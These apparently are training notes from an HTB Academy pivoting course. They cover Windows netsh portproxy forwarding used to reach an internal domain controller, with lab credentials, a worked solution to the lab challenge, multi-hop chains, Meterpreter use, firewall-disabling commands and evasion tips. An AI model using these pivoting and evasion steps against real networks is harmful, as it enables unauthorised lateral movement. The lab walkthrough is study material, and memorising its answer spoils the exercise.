⚙️Netsh Port Forwarding

📋 Module Overview

Purpose: Native Windows port forwarding using built-in tools Tool: netsh.exe - Windows network configuration utility Technique: IPv4-to-IPv4 port proxy forwarding Advantage: No external tools required (living off the land) Scenario: Windows workstation as pivot to internal network

---

1. Introduction to Windows Netsh

What is Netsh?

• Full Name: Network Shell (netsh.exe)

• Type: Built-in Windows command-line utility

• Purpose: Network configuration and management

• Location: C:\Windows\System32\netsh.exe

• Availability: Present on all Windows systems

• Privileges: Requires administrator privileges for port forwarding

Netsh Capabilities

1. Finding routes - network path discovery

2. Viewing firewall configuration - Windows Firewall management

3. Adding proxies - proxy server configuration

4. Creating port forwarding rules - IPv4-to-IPv4 forwarding

5. Network interface management - adapter configuration

Netsh vs Other Windows Tools

Tool	Type	Availability	Configuration	Stealth
Netsh	Built-in	Always present	Command-line	High (legitimate tool)
Plink	External	PuTTY required	SSH-based	Medium (admin tool)
PowerShell	Built-in	Windows 7+	Script-based	High (native)
SSH	External	Windows 10+	SSH tunneling	Medium (newer feature)

Network Topology Example

[Attack Host] → [Windows 10 Pivot] → [Windows Server]
10.10.15.5       10.129.15.150        172.16.5.25:3389
xfreerdp         netsh portproxy      RDP service
:8080            :8080 → :3389        Domain Controller

---

2. Basic Netsh Port Forwarding

IPv4-to-IPv4 Port Proxy

Creating Port Forward Rule

# Basic netsh port forwarding syntax
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25

# Command breakdown:
# interface portproxy  - portproxy interface
# add v4tov4           - add IPv4-to-IPv4 forwarding rule
# listenport=8080      - port to listen on (pivot host)
# listenaddress=       - IP to bind listener (pivot host)
# connectport=3389     - destination port (target)
# connectaddress=      - destination IP (target)

Verifying Port Forward

# Show all IPv4-to-IPv4 port forwards
netsh.exe interface portproxy show v4tov4

# Expected output:
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.129.15.150   8080        172.16.5.25     3389

Understanding the Configuration

• Listen Address: 10.129.15.150 (Windows 10 pivot host)

• Listen Port: 8080 (accessible from attack host)

• Connect Address: 172.16.5.25 (internal Windows server)

• Connect Port: 3389 (RDP service)

---

3. Practical Implementation

Step 1: Access Windows Pivot Host

# RDP to Windows 10 pivot (from HTB Academy lab)
xfreerdp /v:<windows_pivot_ip> /u:htb-student /p:HTB_@cademy_stdnt!

# Verify current network configuration
ipconfig
netstat -an | findstr :3389

Step 2: Create Port Forward Rule

# Open Command Prompt as Administrator
# Run netsh port forwarding command
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.19

# Note: Adjust IP addresses based on lab environment

Step 3: Verify Configuration

# Check if rule was created successfully
netsh.exe interface portproxy show v4tov4

# Verify port is listening
netstat -an | findstr :8080

# Expected output:
TCP    10.129.15.150:8080     0.0.0.0:0         LISTENING

Step 4: Test Port Forward

# From attack host (Pwnbox), connect through port forward
xfreerdp /v:10.129.15.150:8080 /u:victor /p:pass@123 /cert:ignore

# Traffic flow: Attack Host → Pivot:8080 → DC:3389

---

4. Advanced Netsh Configurations

Multiple Port Forwards

# Forward multiple services simultaneously
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.19
netsh.exe interface portproxy add v4tov4 listenport=8445 listenaddress=10.129.15.150 connectport=445 connectaddress=172.16.5.19
netsh.exe interface portproxy add v4tov4 listenport=8135 listenaddress=10.129.15.150 connectport=135 connectaddress=172.16.5.19

# Verify all forwards
netsh.exe interface portproxy show v4tov4

Different Interface Binding

# Bind to all interfaces (0.0.0.0)
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=3389 connectaddress=172.16.5.19

# Bind to specific interface only
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=192.168.1.100 connectport=3389 connectaddress=172.16.5.19

IPv6 Support

# IPv6-to-IPv6 forwarding
netsh.exe interface portproxy add v6tov6 listenport=8080 listenaddress=::1 connectport=3389 connectaddress=fe80::1

# IPv4-to-IPv6 forwarding
netsh.exe interface portproxy add v4tov6 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=fe80::1

# IPv6-to-IPv4 forwarding
netsh.exe interface portproxy add v6tov4 listenport=8080 listenaddress=::1 connectport=3389 connectaddress=172.16.5.19

---

5. HTB Academy Lab Exercise

Lab Challenge

"Using the concepts covered in this section, take control of the DC (172.16.5.19) using xfreerdp by pivoting through the Windows 10 target host. Submit the approved contact's name found inside the 'VendorContacts.txt' file located in the 'Approved Vendors' folder on Victor's desktop (victor's credentials: victor:pass@123)."

Complete Solution Steps

Step 1: Connect to Windows 10 Pivot

# RDP to Windows 10 pivot host
xfreerdp /v:<windows10_ip> /u:htb-student /p:HTB_@cademy_stdnt! /cert:ignore

# Example IP from lab environment
xfreerdp /v:10.129.42.198 /u:htb-student /p:HTB_@cademy_stdnt! /cert:ignore

Step 2: Configure Netsh Port Forward

# In Windows 10 Command Prompt (Run as Administrator)
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.42.198 connectport=3389 connectaddress=172.16.5.19

# Verify configuration
netsh.exe interface portproxy show v4tov4

# Expected output:
Listen on ipv4:             Connect to ipv4:
Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.129.42.198   8080        172.16.5.19     3389

Step 3: Test Port Forward

# Verify port is listening
netstat -an | findstr :8080

# Expected output:
TCP    10.129.42.198:8080     0.0.0.0:0         LISTENING

Step 4: Connect to DC through Port Forward

# From attack host (Pwnbox)
xfreerdp /v:10.129.42.198:8080 /u:victor /p:pass@123 /cert:ignore

# This connects: Attack Host → Windows10:8080 → DC:3389

Step 5: Navigate to File Location

# Once logged in as victor on DC (172.16.5.19):
1. Open File Explorer
2. Navigate to Desktop
3. Open "Approved Vendors" folder
4. Open "VendorContacts.txt" file
5. Find the approved contact name

Step 6: Submit Answer

# Format: 1 space, not case-sensitive
Answer: [Approved contact name from VendorContacts.txt]

Expected File Path: C:\Users\victor\Desktop\Approved Vendors\VendorContacts.txt

---

6. Troubleshooting Netsh Issues

Common Problems

Access Denied Errors

# Problem: Insufficient privileges
Access is denied.

# Solutions:
1. Run Command Prompt as Administrator
   Right-click CMD → "Run as administrator"

2. Verify user privileges
   whoami /priv

3. Check if user is in Administrators group
   net user %username%

Port Already in Use

# Problem: Listen port already bound
The process cannot access the file because it is being used by another process.

# Solutions:
1. Check what's using the port
   netstat -ano | findstr :8080

2. Kill process using port
   taskkill /PID <process_id> /F

3. Use different port
   netsh.exe interface portproxy add v4tov4 listenport=8081 ...

Connection Refused

# Problem: Cannot connect to forwarded port
Connection refused

# Solutions:
1. Verify port forward exists
   netsh.exe interface portproxy show v4tov4

2. Check Windows Firewall
   netsh advfirewall firewall show rule name=all

3. Test local connectivity
   telnet 172.16.5.19 3389

Firewall Blocking

# Problem: Windows Firewall blocking connections
# Solutions:

1. Add firewall exception for port
   netsh advfirewall firewall add rule name="Port 8080" dir=in action=allow protocol=TCP localport=8080

2. Temporarily disable firewall (testing only)
   netsh advfirewall set allprofiles state off

3. Check existing rules
   netsh advfirewall firewall show rule name=all | findstr 8080

---

7. Management and Cleanup

Listing Port Forwards

# Show all IPv4-to-IPv4 forwards
netsh.exe interface portproxy show v4tov4

# Show all IPv6-to-IPv6 forwards
netsh.exe interface portproxy show v6tov6

# Show all port proxy configurations
netsh.exe interface portproxy show all

Deleting Port Forwards

# Delete specific IPv4-to-IPv4 forward
netsh.exe interface portproxy delete v4tov4 listenport=8080 listenaddress=10.129.15.150

# Delete all IPv4-to-IPv4 forwards
netsh.exe interface portproxy reset

# Delete specific IPv6 forwards
netsh.exe interface portproxy delete v6tov6 listenport=8080 listenaddress=::1

Persistent Configuration

# Port forwards created with netsh are persistent across reboots
# They survive system restarts automatically

# To make temporary (session-only) forwards, consider alternatives:
# - SSH local forwarding
# - PowerShell port forwarding scripts
# - Third-party tools

---

8. Security Considerations

Operational Security (OPSEC)

1. Legitimate Tool - netsh.exe is standard Windows utility

2. Administrative Logs - commands logged in Windows Event Log

3. Persistent Rules - forwards survive reboots (good for persistence)

4. Firewall Integration - works with Windows Firewall

5. Process Visibility - no additional processes required

Detection Risks

1. Command Line Auditing - PowerShell/CMD logging may capture commands

2. Event Log Entries - Windows Security log may record configuration changes

3. Network Monitoring - unusual port listeners detectable

4. Registry Changes - port proxy rules stored in registry

5. Forensic Artifacts - commands may be recoverable from memory/disk

Registry Storage

# Port proxy rules stored in registry
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp

# View registry entries
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp

---

9. Integration with Other Techniques

Netsh + SSH Tunneling

# Combine netsh port forwarding with SSH tunnels
# 1. Create netsh forward on Windows pivot
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=22 connectaddress=172.16.5.100

# 2. SSH through the forward from attack host
ssh -L 9999:172.16.5.19:3389 user@10.129.15.150 -p 8080

Netsh + Meterpreter

# Use Meterpreter to execute netsh commands
meterpreter > shell
C:\> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.19

# Or use Meterpreter's portfwd along with netsh
meterpreter > portfwd add -l 8081 -p 3389 -r 172.16.5.19

PowerShell Integration

# PowerShell wrapper for netsh commands
function New-PortForward {
    param(
        [int]$ListenPort,
        [string]$ListenAddress,
        [int]$ConnectPort,
        [string]$ConnectAddress
    )
    
    $cmd = "netsh.exe interface portproxy add v4tov4 listenport=$ListenPort listenaddress=$ListenAddress connectport=$ConnectPort connectaddress=$ConnectAddress"
    Invoke-Expression $cmd
}

# Usage
New-PortForward -ListenPort 8080 -ListenAddress "10.129.15.150" -ConnectPort 3389 -ConnectAddress "172.16.5.19"

---

10. Advanced Scenarios

Multi-Hop Pivoting

# Chain multiple netsh forwards
# Windows Pivot 1 (DMZ)
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=192.168.1.100 connectport=8080 connectaddress=10.0.0.50

# Windows Pivot 2 (Internal)
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.0.0.50 connectport=3389 connectaddress=10.0.1.10

Service-Specific Forwarding

# RDP forwarding
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=3389 connectaddress=172.16.5.19

# SMB forwarding
netsh.exe interface portproxy add v4tov4 listenport=8445 listenaddress=0.0.0.0 connectport=445 connectaddress=172.16.5.19

# WinRM forwarding
netsh.exe interface portproxy add v4tov4 listenport=8985 listenaddress=0.0.0.0 connectport=5985 connectaddress=172.16.5.19

# HTTPS forwarding
netsh.exe interface portproxy add v4tov4 listenport=8443 listenaddress=0.0.0.0 connectport=443 connectaddress=172.16.5.19

Load Balancing Simulation

# Forward to multiple backends (manual round-robin)
netsh.exe interface portproxy add v4tov4 listenport=8081 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.5.10
netsh.exe interface portproxy add v4tov4 listenport=8082 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.5.11
netsh.exe interface portproxy add v4tov4 listenport=8083 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.5.12

---

11. Comparison with Other Windows Tools

Netsh vs Windows Alternatives

Tool	Complexity	Persistence	Admin Required	Stealth
Netsh	Low	High (persistent)	Yes	High
PowerShell	Medium	Low (script-based)	Depends	Medium
Windows Firewall	High	High	Yes	High
IIS URL Rewrite	High	High	Yes	Medium

When to Use Netsh

✅ Windows environment with admin access ✅ Persistent forwarding needed across reboots ✅ Simple port forwarding requirements ✅ Living off the land approach preferred ✅ No external tools can be installed

When NOT to Use Netsh

❌ No admin privileges available ❌ Complex routing requirements ❌ Cross-platform compatibility needed ❌ Temporary forwarding only (creates persistent rules) ❌ Stealth operation (logged extensively)

---

12. Best Practices

Operational Guidelines

1. Test locally first - verify connectivity before deployment

2. Use non-standard ports - avoid common port detection

3. Document configurations - track created port forwards

4. Clean up after use - remove forwards when done

5. Monitor connections - watch for unexpected traffic

Security Recommendations

1. Minimize exposure time - create forwards only when needed

2. Use specific bind addresses - avoid 0.0.0.0 when possible

3. Implement access controls - Windows Firewall rules

4. Monitor event logs - watch for detection indicators

5. Rotate ports regularly - vary port usage patterns

Performance Considerations

1. Limit concurrent forwards - avoid resource exhaustion

2. Monitor bandwidth usage - track network utilization

3. Consider connection limits - Windows has TCP connection limits

4. Optimize for target services - tune for specific protocols

5. Test under load - verify performance with multiple connections

---

References

• HTB Academy: Pivoting, Tunneling & Port Forwarding - Page 11

• Microsoft Netsh Documentation: Official Netsh Reference

• Netsh Portproxy: Port Proxy Commands

• Windows Network Security: Security Considerations

• SANS Windows Pivoting: Windows Lateral Movement Techniques